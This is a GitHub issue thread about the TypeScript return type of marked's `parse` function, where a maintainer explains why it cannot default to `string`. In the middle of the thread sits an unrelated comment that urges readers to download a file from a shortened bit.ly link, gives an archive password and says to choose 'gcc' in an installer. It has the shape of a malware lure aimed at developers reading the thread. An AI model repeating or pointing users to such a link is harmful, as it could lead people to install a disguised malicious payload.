### ISSUE TITLE
Can the parse function be typed to return a string by default?

### ISSUE THREAD

**Issue by mirkonasato** [markedjs/marked#3432]
**What pain point are you perceiving?.**

I see that after change #3341 released in v14.0.0 the value returned by the `parse` function is correctly inferred to be a `string` in TypeScript, but only if you explicitly pass `async: false`

```ts
const html: string = marked.parse(md, { async: false });
```

However it's still a `Promise<string> | string` by default

```ts
const html: Promise<string> | string = marked.parse(md);
```

forcing me to cast the result, which is not ideal:

```ts
const html = marked.parse(md) as string;
```

**Describe the solution you'd like**

Is there any reason why `parse` cannot treat the case where no `options` are passed in the same way as when passing `async: false`? So users can write

```ts
const html: string = marked.parse(md);
```

It seems to me the [overloadedParse type](https://github.com/markedjs/marked/blob/v14.1.0/src/Instance.ts#L265) could be simplified to

```ts
    type overloadedParse = {
      (src: string, options: MarkedOptions & { async: true }): Promise<string>;
      (src: string, options?: MarkedOptions | undefined | null): string;
    };
```

given that TypeScript will pick the [first matching overload](https://www.typescriptlang.org/docs/handbook/declaration-files/do-s-and-don-ts.html#ordering).

Happy to put together a PR if this makes sense, but I first wanted to check if I'm missing something because I'm not familiar with the full codebase.

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by UziTech** [comment]
If an extension sets `{ async: true }` then `marked.parse(md)` will return a `Promise<string>`

```js
import { marked } from 'marked';

marked.use({ async: true });

marked.parse(''); // will return Promise<string>
```

**Comment by mirkonasato** [comment]
Understood, thanks.
